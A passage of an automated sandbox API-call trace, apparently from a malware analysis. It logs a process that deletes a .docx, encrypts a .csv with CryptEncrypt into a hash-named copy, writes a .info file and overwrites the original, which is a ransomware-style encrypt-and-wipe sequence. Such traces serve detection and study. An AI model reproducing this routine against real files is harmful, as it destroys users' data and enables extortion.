HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.473] GetFileType (hFile=0x36c) returned 0x1 [0076.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.473] GetFileType (hFile=0x36c) returned 0x1 [0076.473] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.473] CloseHandle (hObject=0x36c) returned 1 [0076.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.473] GetFileType (hFile=0x36c) returned 0x1 [0076.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.473] GetFileType (hFile=0x36c) returned 0x1 [0076.473] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.473] CloseHandle (hObject=0x36c) returned 1 [0076.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.473] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\quhaji.docx")) returned 1 [0076.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", lpFilePart=0x0) returned 0x51 [0076.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\1cc44ee1de728950bb6e113b67c25bb9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.474] GetFileType (hFile=0x36c) returned 0x1 [0076.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.474] GetFileType (hFile=0x36c) returned 0x1 [0076.475] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.475] CloseHandle (hObject=0x36c) returned 1 [0076.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", lpFilePart=0x0) returned 0x51 [0076.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\1cc44ee1de728950bb6e113b67c25bb9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.475] GetFileType (hFile=0x36c) returned 0x1 [0076.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.475] GetFileType (hFile=0x36c) returned 0x1 [0076.475] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.475] CloseHandle (hObject=0x36c) returned 1 [0076.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9", lpFilePart=0x0) returned 0x51 [0076.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\1CC44EE1DE728950BB6E113B67C25BB9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\1cc44ee1de728950bb6e113b67c25bb9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.475] GetFileType (hFile=0x36c) returned 0x1 [0076.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.475] GetFileType (hFile=0x36c) returned 0x1 [0076.475] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.476] CloseHandle (hObject=0x36c) returned 1 [0076.476] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.476] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.477] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x2190c68, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626ec0) returned 1 [0076.477] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.477] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.477] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2190d58, pdwDataLen=0x1bf5d230 | out: pbData=0x2190d58*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.477] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x2190e78, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0076.477] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.477] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.477] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626d00) returned 1 [0076.477] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.477] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x4, pbData=0x2190fc0*=0x1, dwFlags=0x0) returned 1 [0076.477] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x1, pbData=0x2190f70, dwFlags=0x0) returned 1 [0076.477] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.477] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.477] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", lpFilePart=0x0) returned 0x51 [0076.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\e6e0f8cdcc9b853d6373319a5b0e9869"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.478] ReadFile (in: hFile=0x36c, lpBuffer=0x2191388, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2191388*, lpNumberOfBytesRead=0x1bf5d128*=0x9e1f, lpOverlapped=0x0) returned 1 [0076.479] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21a53a0*, pdwDataLen=0x1bf5d180*=0x9e10, dwBufLen=0x9e10 | out: pbData=0x21a53a0*, pdwDataLen=0x1bf5d180*=0x9e10) returned 1 [0076.479] WriteFile (in: hFile=0x3a4, lpBuffer=0x21a53a0*, nNumberOfBytesToWrite=0x9e10, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x21a53a0*, lpNumberOfBytesWritten=0x1bf5d118*=0x9e10, lpOverlapped=0x0) returned 1 [0076.481] ReadFile (in: hFile=0x36c, lpBuffer=0x2191388, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2191388*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.481] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21af1f0*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x21af1f0*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.481] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21af240*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x21af240*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.481] WriteFile (in: hFile=0x3a4, lpBuffer=0x21af290*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x21af290*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.481] CloseHandle (hObject=0x3a4) returned 1 [0076.482] CloseHandle (hObject=0x36c) returned 1 [0076.482] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.482] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.482] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.482] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", lpFilePart=0x0) returned 0x51 [0076.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\e6e0f8cdcc9b853d6373319a5b0e9869"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.483] GetFileType (hFile=0x36c) returned 0x1 [0076.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.483] GetFileType (hFile=0x36c) returned 0x1 [0076.483] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.484] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.485] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.492] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.493] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.493] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.493] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.493] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.493] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.494] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0xe20, lpOverlapped=0x0) returned 1 [0076.494] ReadFile (in: hFile=0x36c, lpBuffer=0x21b0998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21b0998*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.494] CloseHandle (hObject=0x36c) returned 1 [0076.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869.info", lpFilePart=0x0) returned 0x56 [0076.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\e6e0f8cdcc9b853d6373319a5b0e9869.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.499] GetFileType (hFile=0x36c) returned 0x1 [0076.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.500] GetFileType (hFile=0x36c) returned 0x1 [0076.500] WriteFile (in: hFile=0x36c, lpBuffer=0x21bd068*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x21bd068*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.501] CloseHandle (hObject=0x36c) returned 1 [0076.501] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe53d70, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x888f6a30, ftLastAccessTime.dwHighDateTime=0x1d4d0e7, ftLastWriteTime.dwLowDateTime=0x888f6a30, ftLastWriteTime.dwHighDateTime=0x1d4d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x9e1f)) returned 1 [0076.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.502] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", dwFileAttributes=0x80) returned 1 [0076.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv"), fInfoLevelId=0x0, lpFileInformation=0x21c4c70 | out: lpFileInformation=0x21c4c70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8fe53d70, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x888f6a30, ftLastAccessTime.dwHighDateTime=0x1d4d0e7, ftLastWriteTime.dwLowDateTime=0x888f6a30, ftLastWriteTime.dwHighDateTime=0x1d4d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x9e1f)) returned 1 [0076.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.502] GetFileType (hFile=0x36c) returned 0x1 [0076.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.502] GetFileType (hFile=0x36c) returned 0x1 [0076.502] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.503] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.504] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.506] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.506] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.507] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.508] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.508] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.509] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.510] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0076.510] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 